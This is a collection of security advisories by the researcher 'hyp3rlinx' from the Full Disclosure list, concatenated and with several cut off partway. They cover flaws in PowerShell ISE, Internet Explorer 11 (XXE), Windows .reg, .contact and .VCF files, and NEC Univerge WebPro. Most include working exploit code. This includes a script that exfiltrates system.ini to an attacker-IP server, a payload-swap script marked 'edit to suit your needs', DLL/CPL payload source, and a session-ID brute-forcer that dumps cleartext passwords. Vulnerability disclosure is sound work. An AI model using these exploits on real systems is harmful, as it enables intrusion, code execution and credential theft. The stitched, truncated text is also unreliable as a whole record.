not valid: [Hello-World].ps1" when pointing to another PS file named -.ps1 and seems to treat it sort of like a meta-character. [pw3d].ps1 <= expected to execute 3.ps1 <= actually executed This exploits the trust between PowerShell ISE and the end user. So scripts debugged local or over a network share display "trusted" code in ISE that is expected to run. However, when the user debugs the script a different script gets executed. Interestingly, that second script does NOT get loaded into PowerShell ISE upon execution, so a user may not see anything amiss. User interaction is required for a successful attack to occur and obviously running any unknown PowerShell script can be dangerous. Again, this exploit takes advantage of "trust" where users can see and read the code and will trust it as everything looks just fine and yet ... still they get PWNED!. Tested successfully on Win7/10 Long live user interaction! lol... [POC Video URL] https://www.youtube.com/watch?v=T2I_-iUPaFw [Exploit/POC] After opening PS files in ISE, set the execution policy so can test without issues. set-executionpolicy unrestricted -force PS scripts over Network shares may get 'RemoteSigned' security policy issue so run below cmd. set-executionpolicy unrestricted -force process Choose 'R' to run once. Below Python script will create two .ps1 files to demonstrate the vulnerable condition. Examine the code, what does it say? it reads... Write-output "Hello World!"... now Run it... BAM! other PS script executes!. #PowerShell ISE 0day Xploit #ZDI-CAN-8005 #ZDI CVSS: 7.0 #hyp3rlinx #ApparitionSec fname1="[HelloWorldTutoria1].ps1"#Expected code to run is 'HelloWorld!' fname2="1.ps1" #Actual code executed is calc.exe for Poc evil_code="start calc.exe" #Edit to suit your needs. c=0 payload1='Write-Output "Hello World!"' payload2=evil_code+"\n"+'Write-Output "Hello World!"' def mk_ps_hijack_script(): global c c+=1 f=open(globals()["fname"+str(c)],"wb") f.write(globals()["payload"+str(c)]) f.close() if c<2: mk_ps_hijack_script() if __name__=="__main__": mk_ps_hijack_script() print "PowerShell ISE Xploit 0day Files Created!" print "Discovery by hyp3rlinx" print "ZDI-CAN-8005" [Network Access] Remote [Severity] High [Disclosure Timeline] ZDI Case opened : 2019-02-06 Case off
Re: [FD] Microsoft Internet Explorer v11 / XML External Entity Injection 0day
Vimeo reinstated my account few hours later but I switched to youtube for now.. but will check those out. Thank you for that... hyp3rlinx On Tue, Apr 16, 2019 at 4:12 AM bo0od wrote: > have your own videos either on one of the PeerTubes instances or have > your own instance. > > https://joinpeertube.org/en/ > > other good alternative would be: > > https://mediagoblin.org/pages/tour.html > > Enjoy! > > hyp3rlinx: > > vimeo removed my account for no good reason so new POC url is included. > > > > [+] Credits: John Page (aka hyp3rlinx) > > [+] Website: hyp3rlinx.altervista.org > > [+] Source: > > > http://hyp3rlinx.altervista.org/advisories/MICROSOFT-INTERNET-EXPLORER-v11-XML-EXTERNAL-ENTITY-INJECTION-0DAY.txt > > [+] ISR: ApparitionSec > > > > > > [Vendor] > > www.microsoft.com > > > > > > [Product] > > Microsoft Internet Explorer v11 > > (latest version) > > > > Internet Explorer is a series of graphical web browsers developed by > > Microsoft and included in the Microsoft Windows line of operating > systems, > > starting in 1995. > > > > > > [Vulnerability Type] > > XML External Entity Injection > > > > > > > > [CVE Reference] > > N/A > > > > > > > > [Security Issue] > > Internet Explorer is vulnerable to XML External Entity attack if a user > > opens a specially crafted .MHT file locally. > > > > This can allow remote attackers to potentially exfiltrate Local files and > > conduct remote reconnaissance on locally installed > > Program version information. Example, a request for > "c:\Python27\NEWS.txt" > > can return version information for that program. > > > > Upon opening the malicious ".MHT" file locally it should launch Internet > > Explorer. Afterwards, user interactions like duplicate tab "Ctrl+K" > > and other interactions like right click "Print Preview" or "Print" > commands > > on the web-page may also trigger the XXE vulnerability. > > > > However, a simple call to the window.print() Javascript function should > do > > the trick without requiring any user interaction with the webpage. > > Importantly, if files are downloaded from the web in a compressed archive > > and opened using certain archive utilities MOTW may not work as > advertised. > > > > Typically, when instantiating ActiveX Objects like "Microsoft.XMLHTTP" > > users will get a security warning bar in IE and be prompted > > to activate blocked content. However, when opening a specially crafted > .MHT > > file using malicious markup tags the user will get no such > > active content or security bar warnings. > > > > e.g. > > > > C:\sec>python -m SimpleHTTPServer > > Serving HTTP on 0.0.0.0 port 8000 ... > > 127.0.0.1 - - [10/Apr/2019 20:56:28] "GET /datatears.xml HTTP/1.1" 200 - > > 127.0.0.1 - - [10/Apr/2019 20:56:28] "GET > > > /?;%20for%2016-bit%20app%20support[386Enh]woafont=dosapp.fonEGA80WOA.FON=EGA80WOA.FONEGA40WOA.FON=EGA40WOA.FONCGA80WOA.FON=CGA80WOA.FONCGA40WOA.FON=CGA40WOA.FON[drivers]wave=mmdrv.dlltimer=timer.drv[mci] > > HTTP/1.1" 200 - > > > > > > Tested successfully in latest Internet Explorer Browser v11 with latest > > security patches on Win7/10 and Server 2012 R2. > > > > > > > > [POC/Video URL] > > https://www.youtube.com/watch?v=fbLNbCjgJeY > > > > > > > > [Exploit/POC] > > POC to exfil Windows "system.ini" file. > > Note: Edit attacker server IP in the script to suit your needs. > > > > 1) Use below script to create the "datatears.xml" XML and XXE embedded > > "msie-xxe-0day.mht" MHT file. > > > > 2) python -m SimpleHTTPServer > > > > 3) Place the generated "datatears.xml" in Python server web-root. > > > > 4) Open the generated "msie-xxe-0day.mht" file, watch your files be > > exfiltrated. > > > > > > #Microsoft Internet Explorer XXE 0day > > #Creates malicious XXE .MHT and XML files > > #Open the MHT file in MSIE locally, should exfil system.ini > > #By hyp3rlinx > > #ApparitionSec > > > > ATTACKER_IP="localhost" > > PORT="8000" > > > > mht_file=( > > 'From:\n' > > 'Subject:\n' > > 'Date:\n' > > 'MIME-Version: 1.0\n' > > 'Content-Type: multipart/related; type="text/html";\n' > > '\tboundary=
[FD] Microsoft Internet Explorer v11 / XML External Entity Injection 0day
vimeo removed my account for no good reason so new POC url is included. [+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-INTERNET-EXPLORER-v11-XML-EXTERNAL-ENTITY-INJECTION-0DAY.txt [+] ISR: ApparitionSec [Vendor] www.microsoft.com [Product] Microsoft Internet Explorer v11 (latest version) Internet Explorer is a series of graphical web browsers developed by Microsoft and included in the Microsoft Windows line of operating systems, starting in 1995. [Vulnerability Type] XML External Entity Injection [CVE Reference] N/A [Security Issue] Internet Explorer is vulnerable to XML External Entity attack if a user opens a specially crafted .MHT file locally. This can allow remote attackers to potentially exfiltrate Local files and conduct remote reconnaissance on locally installed Program version information. Example, a request for "c:\Python27\NEWS.txt" can return version information for that program. Upon opening the malicious ".MHT" file locally it should launch Internet Explorer. Afterwards, user interactions like duplicate tab "Ctrl+K" and other interactions like right click "Print Preview" or "Print" commands on the web-page may also trigger the XXE vulnerability. However, a simple call to the window.print() Javascript function should do the trick without requiring any user interaction with the webpage. Importantly, if files are downloaded from the web in a compressed archive and opened using certain archive utilities MOTW may not work as advertised. Typically, when instantiating ActiveX Objects like "Microsoft.XMLHTTP" users will get a security warning bar in IE and be prompted to activate blocked content. However, when opening a specially crafted .MHT file using malicious markup tags the user will get no such active content or security bar warnings. e.g. C:\sec>python -m SimpleHTTPServer Serving HTTP on 0.0.0.0 port 8000 ... 127.0.0.1 - - [10/Apr/2019 20:56:28] "GET /datatears.xml HTTP/1.1" 200 - 127.0.0.1 - - [10/Apr/2019 20:56:28] "GET /?;%20for%2016-bit%20app%20support[386Enh]woafont=dosapp.fonEGA80WOA.FON=EGA80WOA.FONEGA40WOA.FON=EGA40WOA.FONCGA80WOA.FON=CGA80WOA.FONCGA40WOA.FON=CGA40WOA.FON[drivers]wave=mmdrv.dlltimer=timer.drv[mci] HTTP/1.1" 200 - Tested successfully in latest Internet Explorer Browser v11 with latest security patches on Win7/10 and Server 2012 R2. [POC/Video URL] https://www.youtube.com/watch?v=fbLNbCjgJeY [Exploit/POC] POC to exfil Windows "system.ini" file. Note: Edit attacker server IP in the script to suit your needs. 1) Use below script to create the "datatears.xml" XML and XXE embedded "msie-xxe-0day.mht" MHT file. 2) python -m SimpleHTTPServer 3) Place the generated "datatears.xml" in Python server web-root. 4) Open the generated "msie-xxe-0day.mht" file, watch your files be exfiltrated. #Microsoft Internet Explorer XXE 0day #Creates malicious XXE .MHT and XML files #Open the MHT file in MSIE locally, should exfil system.ini #By hyp3rlinx #ApparitionSec ATTACKER_IP="localhost" PORT="8000" mht_file=( 'From:\n' 'Subject:\n' 'Date:\n' 'MIME-Version: 1.0\n' 'Content-Type: multipart/related; type="text/html";\n' '\tboundary="=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_0001"\n' 'This is a multi-part message in MIME format.\n\n\n' '--=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_0001\n' 'Content-Type: text/html; charset="UTF-8"\n' 'Content-Location: main.htm\n\n' 'http://www.w3.org/TR/html4/transitional.dtd";>\n' '\n' '\n' '\n' 'MSIE XXE 0day\n' '\n' '\n' '\n' '\n' '\n' '\n' '%sp;\n' '%param1;\n' ']>\n' '&exfil;\n' '&exfil;\n' '&exfil;\n' '&exfil;\n' '\n' 'window.print();\n' '\n' '\n' '\n' 'MSIE XML External Entity 0day PoC.\n' 'Discovery: hyp3rlinx\n' 'ApparitionSec\n' '\n' '\n' '\n' '\n' '\n\n\n' '--=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_0001--' ) xml_file=( '\n' '">\n' '\n' '">\n' ) def mk_msie_0day_filez(f,p): f=open(f,"wb") f.write(p) f.close() if __name__ == "__main__": mk_msie_0day_filez("msie-xxe-0day.mht",mht_file) mk_msie_0day_filez("datatears.xml",xml_file) print "Microsoft Internet Explorer XML External Entity 0day PoC." print "Files msie-xxe-0day.mht and datatears.xml Created!
[FD] [**UPDATED] Microsoft Windows .Reg File / Dialog Box Message Spoofing 0day
Added a few things I had previously left out that should have been mentioned earlier. [+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-.REG-FILE-DIALOG-BOX-MESSAGE-SPOOFING.txt [+] ISR: ApparitionSec [Vendor] www.microsoft.com [Product] A file with the .reg file extension is a Registration file used by the Windows registry. These files can contain hives, keys, and values. .reg files can be created from scratch in a text editor or can be produced by the Windows registry when backing up parts of the registry. [Vulnerability Type] Windows .Reg File Dialog Box Message Spoofing [CVE Reference] N/A [Security Issue] The Windows registry editor allows specially crafted .reg filenames to spoof the default registry dialog warning box presented to an end user. This can potentially trick unsavvy users into choosing the wrong selection shown on the dialog box. Furthermore, we can deny the registry editor its ability to show the default secondary status dialog box (Win 10), thereby hiding the fact that our attack was successful. Normally when a user opens a .reg file UAC will launch (if user is run as Admin) if targeting a non privleged user we can still hijack HKCU reg settings without having to deal with UAC. After they will get the registry security warning dialog box asking them if they "trust the source" and "Are you sure you want to continue?" etc and will also have a choice of either 'Yes' or 'No' to select from. However, we can inject our own messages thru the filename to direct the user to wrongly click "Yes", as the expected "Are you sure you want to continue?" dialog box message is under our control. The registry dialog echoes back the filename plus any text we add and allows us to terminate part of its default security warning message. We achieve this using % encoded characters in the filename like %n or %r and %0. Example, the "do not add it to the registry" and "Are you sure you want to continue?" default warning messages can be done away with using %0. This spoofing flaw lets us spoof the "Are you sure you want to continue?" warning message to instead read "Click Yes" or whatever else we like. Potentially making a user think they are cancelling the registry import as the security warning dialog box is now lying to them. Denial of secondary registry editor status dialog box (hiding successful attacks) in Windows 10: Typically, upon a successful import the registry editor pops up another dialog box with a status message telling us "the keys and values contained in have been successfully added to the registry". We can obstruct that behavior to deny this secondary registry editor dialog from appearing by tacking on a (null) right before the end of our filename using %1 or %25 like: "Microsoft-Security-Update-v1.2-Windows-10.r%e%g%r%nC%l%i%c%k%b%Y%e%s%b%b%b%1%0.reg" If don't want to use (null) use %3 but it will display a asian char instead but still prevents the secondary registry dialog box you. You will have to manually refresh the registry written to in order to see the values stored when using these dialog denial of service methods. Note: Denial of the secondary dialog box seems to only work on Windows 10. Behaviors I discovered playing with registry filenames that affect the dialog box, depending on Windows OS version you will get different results. % - can be used for obfuscation e.g. %h%a%t%e = hate %b will create white-space %n makes a newline %r makes a newline %1 creates (null) - important as we prevent the second registry dialog from appearing after a successful import! %0 Important terminates string %25 (Windows 10) creates (null) - Important as we prevent the second registry dialog from appearing after a successful import! %3 - Important as we prevent the second registry dialog from appearing after a successful import! (but shows asian char) %5 (Windows 10) duplicates the default registry dialog box message by "n" amount of times per amount of %5 injected into the filename %25 (Windows 7) duplicates the default registry dialog box message by "n" amount of times per amount of %25 injected into the filename %2525 prevents registry editor from opening %169 will show our junky filename in the dialog box (we don't want that) %3, %197, %17 and some others change the default language shown in the registry dialog box to asian characters etc Each injected character can be separated by a percent "%" sign without messing up our spoofed message, we can leverage this to obfuscate the end of the filename. We then use %0 to terminate the message string so that the second .reg extension and default registry messages are not displayed
[FD] Microsoft Windows .Reg File / Dialog Box Message Spoofing Vulnerability
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-.REG-FILE-DIALOG-BOX-MESSAGE-SPOOFING.txt [+] ISR: ApparitionSec [Vendor] www.microsoft.com [Product] A file with the .reg file extension is a Registration file used by the Windows registry. These files can contain hives, keys, and values. .reg files can be created from scratch in a text editor or can be produced by the Windows registry when backing up parts of the registry. [Vulnerability Type] Windows .Reg File Dialog Box Message Spoofing [CVE Reference] N/A [Security Issue] The Windows registry editor allows specially crafted .reg filenames to spoof the default registry dialog warning box presented to an end user. This can potentially trick unsavvy users into choosing the wrong selection shown on the dialog box. Furthermore, we can deny the registry editor its ability to show the default secondary status dialog box (Win 10), thereby hiding the fact that our attack was successful. Normally when a user opens a .reg file UAC will launch, after they will get the registry security warning dialog box asking them if they "trust the source" and "Are you sure you want to continue?" etc and will also have a choice of either 'Yes' or 'No' to select from. However, we can inject our own messages thru the filename to direct the user to wrongly click "Yes", as the expected "Are you sure you want to continue?" dialog box message is under our control. The registry dialog echoes back the filename plus any text we add and allows us to terminate part of its default security warning message. We achieve this using % encoded characters in the filename like %n or %r and %0. Example, the "do not add it to the registry" and "Are you sure you want to continue?" default warning messages can be done away with using %0. This spoofing flaw lets us spoof the "Are you sure you want to continue?" warning message to instead read "Click Yes" or whatever else we like. Potentially making a user think they are cancelling the registry import as the security warning dialog box is now lying to them. Denial of secondary registry editor status dialog box (hiding successful attacks) in Windows 10: Typically, upon a successful import the registry editor pops up another dialog box with a status message telling us "the keys and values contained in have been successfully added to the registry". We can obstruct that behavior to deny this secondary registry editor dialog from appearing by tacking on a (null) right before the end of our filename using %1 or %25 like: "Microsoft-Security-Update-v1.2-Windows-10.r%e%g%r%nC%l%i%c%k%b%Y%e%s%b%b%b%1%0.reg" If don't want to use (null) use %3 but it will display a asian char instead but still prevents the secondary registry dialog box you. You will have to manually refresh the registry written to in order to see the values stored when using these dialog denial of service methods. Note: Denial of the secondary dialog box seems to only work on Windows 10. Behaviors I discovered playing with registry filenames that affect the dialog box, depending on Windows OS version you will get different results. % - can be used for obfuscation e.g. %h%a%t%e = hate %b will create white-space %n makes a newline %r makes a newline %1 creates (null) - important as we prevent the second registry dialog from appearing after a successful import! %0 Important terminates string %25 (Windows 10) creates (null) - Important as we prevent the second registry dialog from appearing after a successful import! %3 - Important as we prevent the second registry dialog from appearing after a successful import! (but shows asian char) %5 (Windows 10) duplicates the default registry dialog box message by "n" amount of times per amount of %5 injected into the filename %25 (Windows 7) duplicates the default registry dialog box message by "n" amount of times per amount of %25 injected into the filename %2525 prevents registry editor from opening %169 will show our junky filename in the dialog box (we don't want that) %3, %197, %17 and some others change the default language shown in the registry dialog box to asian characters etc Each injected character can be separated by a percent "%" sign without messing up our spoofed message, we can leverage this to obfuscate the end of the filename. We then use %0 to terminate the message string so that the second .reg extension and default registry messages are not displayed in the registry dialog box. The filename "Microsoft-Security-Update-v1.2-Windows-10.r%e%g%r%nC%l%i%c%k%b%Y%e%s%b%b%b%1%0.reg" will show as "Microsoft-Security-Update-v1.2-Windows-10.reg" in the re
[FD] Microsoft Windows .CONTACT File / HTML Injection Mailto: Remote Code Execution
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CONTACT-FILE-HTML-INJECTION-MAILTO-LINK-ARBITRARY-CODE-EXECUTION.txt [+] ISR: ApparitionSec [+] Zero Day Initiative Program [+] ZDI-CAN-7591 [Vendor] www.microsoft.com [Product] Microsoft .CONTACT File A file with the CONTACT file extension is a Windows Contact file. They're used in Windows 10, Windows 8, Windows 7, and Windows Vista. This is the folder where CONTACT files are stored by default: C:\Users\[USERNAME]\Contacts\. [Vulnerability Type] Mailto: HTML Link Injection Remote Code Execution [Security Issue] This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Windows. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The flaw is due to the processing of ".contact" files, the E-mail address field takes an expected E-mail address value, however the .CONTACT file is vulnerable to HTML injection as no validation is performed. Therefore, if an attacker references an executable file using an HREF tag it will run that instead without warning instead of performing the expected email behavior. This is dangerous and would be unexpected to an end user. The E-mail addresses Mailto: will point to an arbitrary executable like. p...@microsoft.com Additionally the executable file can live in a sub-directory and be referenced like "p...@microsoft.com" or attackers can use directory traversal techniques to point to a malware say sitting in the targets Downloads directory like: p...@microsoft.com Making matters worse is if the the files are compressed then downloaded "mark of the web" (MOTW) may potentially not work as expected using certain archive utils. This advisory was initially one of three different vulnerabilities I reported to Zero Day Initiative Program (ZDI), that microsoft decided to not release a security fix for and close. The first cases I reported to ZDI were .VCF and .CONTACT files Website address input fields. This example is yet another vector affecting Windows .CONTACT files and is being released as the .CONTACT file issue is now publicly known. [Exploit/POC] Create a Windows .CONTACT file and inject the following HTML into the E-mail: field p...@microsoft.com Windows will prompt you like "The e-mail address you have entered is not a valid internet e-mail address. Do you still want to add this address?" Click Yes. Open the .CONTACT file and click the Mailto: link BOOM! Windows calculator will execute. Attacker supplied code is not limited to .EXE, .CPL or .COM as .VBS files will also execute! :) [POC Video URL] https://vimeo.com/312824315 [Disclosure Timeline] Reported to ZDI 2018-11-22 (ZDI-CAN-7591) Another separate vulnerability affecting MS Windows .contact files affected the Website address input fields and was publicly disclosed January 16, 2019. https://www.zerodayinitiative.com/advisories/ZDI-19-121/ Public disclosure : January 22, 2019 [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Microsoft Windows ".contact" File / Insufficient UI Warning Arbitrary Code Execution
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CONTACT-FILE-INSUFFECIENT-UI-WARNING-WEBSITE-LINK-ARBITRARY-CODE-EXECUTION.txt [+] ISR: ApparitionSec [Vendor] www.microsoft.com [Product] Microsoft .CONTACT File A file with the CONTACT file extension is a Windows Contact file. They're used in Windows 10, Windows 8, Windows 7, and Windows Vista. This is the folder where CONTACT files are stored by default: C:\Users\[USERNAME]\Contacts\. [Vulnerability Type] Insufficient UI Warning Arbitrary Code Execution [Security Issue] This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Windows. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The flaw is due to the processing of ".contact" files node param which takes an expected website value, however if an attacker references an executable file it will run that instead without warning instead of performing expected web navigation. This is dangerous and would be unexpected to an end user. e.g. www.hyp3rlinx.altervista.com Executable files can live in a sub-directory so when the ".contact" website link is clicked it traverses directories towards the executable and runs. Making matters worse is if the the files are compressed then downloaded "mark of the web" (MOTW) may potentially not work as expected with certain archive utilitys. The ".\" chars allow directory traversal to occur in order to run the attackers supplied executable sitting unseen in the attackers directory. This advisory is a duplicate issue that currently affects Windows .VCF files, and released for the sake of completeness as it affects Windows .contact files as well. [Exploit/POC] Rename any executable file extension from ".exe" to ".com" to be like a valid web domain name. Create a directory to house the executable file Modify the contact file website link like ---> http.\\www..com Contact website link now points at "dir .\ executable" ---> http.\\www..com Compress the files using archive utility and place in webserver for download. [POC Video URL] https://vimeo.com/311759191 [Disclosure Timeline] Reported to ZDI 2018-11-30 This exact same vulnerability exists and affects Microsoft Windows .VCF files sharing the same root cause and was publicly disclosed 2019-01-10. https://www.zerodayinitiative.com/advisories/ZDI-19-013/ Public disclosure : January 16, 2019 [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Microsoft VCF File Insufficient UI Warning Remote Code Execution 0day
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-VCF-FILE-INSUFFICIENT-WARNING-REMOTE-CODE-EXECUTION.txt [+] ISR: ApparitionSec [+] Zero Day Initiative Program [Vendor] www.microsoft.com [Product] A VCF file is a standard file format for storing contact information for a person or business. Microsoft Outlook supports the vCard and vCalendar features. These are a powerful new approach to electronic Personal Data Interchange (PDI). [Vulnerability Type] Insufficient UI Warning Remote Code Execution [CVE Reference] ZDI-19-013 ZDI-CAN-6920 [Security Issue] This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Windows. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the processing of VCard files. Crafted data in a VCard file can cause Windows to display a dangerous hyperlink. The user interface fails to provide any indication of the hazard. An attacker can leverage this vulnerability to execute code in the context of the current user. [Exploit/POC] 1) create a directory and name it "http" this will house the .CPL executable file. 2) create a .CPL file and give it a website name, I named mine "www.hyp3rlinx.altervista.cpl" or whatever website you wish so it can be referenced in the VCF file. #include /* hyp3rlinx */ /* gcc -c -m32 hyp3rlinx.altervista.c gcc -shared -m32 -o hyp3rlinx.altervista.cpl hyp3rlinx.altervista.o */ void ms_vcf_0day(){ MessageBox( 0, "Continue with install?" , "TrickyDealC0der :)" , MB_YESNO + MB_ICONQUESTION ); } BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason,LPVOID lpvReserved){ switch(fdwReason){ case DLL_PROCESS_ATTACH:{ ms_vcf_0day(); break; } case DLL_PROCESS_DETACH:{ ms_vcf_0day(); break; } case DLL_THREAD_ATTACH:{ ms_vcf_0day(); break; } case DLL_THREAD_DETACH:{ ms_vcf_0day(); break; } } return TRUE; } 3) make sure to rename the executable .DLL extension to a .CPL extension if you did not follow compile instructions above to output as ".CPL". e.g. hyp3rlinx.altervista.dll --> hyp3rlinx.altervista.cpl 4) Create .VCF mail file I named mine "trickyDealC0der.vcf" For the URL in the .VCF Mail file specify a URL like... URL;TYPE=home;PREF=1:http.\\www.hyp3rlinx.altervista.cpl The Windows .VCF File content: "trickyDealC0der.vcf" BEGIN:VCARD VERSION:4.0 N:Tricky;DealC0der;;; FN:TrickyDealC0der EMAIL;TYPE=home;PREF=1:M$@PwnedAgain.com TEL;TYPE="cell,home";PREF=1:tel:+000-000- ADR;TYPE=home;PREF=1:;;1 NYC;NY;;WC2N;USA URL;TYPE=home;PREF=1:http.\\www.hyp3rlinx.altervista.cpl END:VCARD Now, open the "trickyDealC0der.vcf" file and click the website link, the VCF file will traverse back one to the "http" directory where our CPL executable file lives and KABOOM! :) [References] https://www.zerodayinitiative.com/advisories/ZDI-19-013/ [Network Access] Remote [POC Video URL] https://vimeo.com/310684003 [Disclosure Timeline] Notification: Trend Micro Zero Day Initiative Program 2018-07-23 - Vulnerability reported to vendor 2019-01-10 - Coordinated public release of advisory 2019-01-10 - Advisory Updated ADDITIONAL DETAILS 08/06/18 - ZDI reported the vulnerability to the vendor 08/07/18 - The vendor acknowledged the report and provided a tracking # 10/01/18 – The vendor requested an additional file 10/03/18 – ZDI provided added files and a new PoC 10/03/18 – The vendor advised the report did not meet the bar for service 10/05/18 – ZDI advised that we believe the report is exploitable and notified the vendor of the intent to 0-day on 10/16/18 10/08/18 – The vendor advised ZDI they had re-considered a fix and requested an extension to 01/08/19 10/09/18 – ZDI agreed to the short extension 11/14/18 – The vendor again advised ZDI of the target patch date 01/08/19 12/12/18 – The vendor provided ZDI a CVE 12/19/18 - The vendor wrote to ZDI to advise that “engineering team had decided to pursue the fix as v.Next” and “Microsoft has decided that it will not be fixing this vulnerability and we are closing this case” 12/27/18 – ZDI notified the vendor of the intent to 0-day on 01/07/18 [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or
[FD] CVE-2018-11741 / CVE-2018-11742 / NEC Univerge Sv9100 WebPro - 6.00 / Predictable Session ID / Clear Text Password Storage
[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/NEC-UNIVERGE-WEBPRO-v6.00-PREDICTABLE-SESSIONID-CLEARTEXT-PASSWORDS.txt [+] ISR: ApparitionSec ***Greetz: indoushka | Eduardo B. 0day*** [Vendor] www.necam.com [Affected Product Code Base] NEC Univerge Sv9100 WebPro - 6.00.00 NEC Univerge WebPro, is a web-based programming tool for the NEC Switch, which is used to program corporate Telephone systems. Public facing installations as of Dec 1, 2018 https://www.shodan.io/search?query=Server+Henry Result: 7,797 [Vulnerability Type(s)] [CVE Reference(s)] Predictable Session ID - CVE-2018-11741 / Cleartext Password Storage - CVE-2018-11742 [Attack Vectors] Make repeated remote HTTP requests until arriving at a valid authenticated sessionId. Security Issue: NEC Univerge WebPro suffers from a "Predictable Session ID" that can potentially disclose all user account information including passwords stored in clear text in the Web UI. Attackers can simply increment numbers until arriving at a live session, then by using a specific URI dump the entire account information for all users including the clear text passwords. e.g.. curl http://NEC-VICTIM-IP/Home.htm?sessionId=12959&GOTO(8) Exploit/POC: = from socket import * import re #Univerge Sv9100 NEC WebPro : 6.00 #Dumps user accounts and plaintext passwords stored in Web UI in Administrator Programming Password Setup' webpage #http://TARGET-IP/Home.htm?sessionId=12959&GOTO(8) "GOTO(8)" will retrieve all account usernames and cleartext passwords. print "NEC Univerge Sv9100 WebPro - 6.00.00 / Remote 0day Exploit POC" print "hyp3rlinx" IP=raw_input("[+] TARGET> ") res='' findme="Programming Password Setup" cnt=0 tmp=False tmp2=False pwned=False #check application is NEC and vuln version def is_NEC_webpro(u): global tmp,tmp2,cnt res='' cnt+=1 s=socket(AF_INET, SOCK_STREAM) s.connect((IP,80)) s.send('GET '+u+' HTTP/1.1\r\nHost: '+IP+'\r\n\r\n') while True: res=s.recv(4048) if res.find('')!=-1: break s.close() if re.findall(r"\bWebPro\b", res): tmp=True if tmp and cnt < 3: is_NEC_webpro('/Login.htm') if re.findall(r"\b6.00.00\b", res) and re.findall(r"\bNEC Corporation of America\b", res): tmp2 = True if tmp == True and tmp2 == True: return True return False def dump(acct): file=open('NEC-Accounts.txt', 'w') file.write(acct+'\n') file.close() def breach(sid): global pwned try: s=socket(AF_INET, SOCK_STREAM) s.connect((IP,80)) sid=str(sid) print 'trying sessid '+sid s.send('GET /Home.htm?sessionId%3d'+sid+'&GOTO(8)%20HTTP/1.1\r\nHost: '+IP+'\r\n\r\n') except Exception as e: print str(e) while True: res = s.recv(4096) if res.find('')!=-1: break if re.findall(r"\bProgramming Password Setup\b",res)!=-1: ## We hit an active session. dump(res) print res pwned=True s.close() return pwned def sessgen(): for sessid in range(1000,15000): ##test 14109 if breach(sessid): break if __name__=='__main__': if is_NEC_webpro('/'): sessgen() else: print 'Not NEC or version not vuln.' Network Access: === Remote Severity: = High Disclosure Timeline: = Vendor Notification: May 15, 2018 No reply Vendor Notification: May 18, 2018 No reply Vendor Notification: June 4, 2018 No reply Mitre assign CVE: June 5, 2018 JPCERT replies: June 6, 2018 JPCERT shares information with NEC : June 7, 2018 Request status : August 11, 2018 JPCERT contact NEC : August 14, 2018 No reply from vendor Request status : August 21, 2018 JPCERT again contacts NEC : August 21, 2018 JPCERT "vendor working on a release" : August 23 2018 JPCERT "Vendor release October 2018" : September 12, 2018 NEC "Requests public disclosure after December 1st." : November 19, 2018 December 2, 2018 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due c
[FD] CVE-2018-15515 / D-LINK Central WifiManager CWM-100 / Trojan File SYSTEM Privilege Escalation
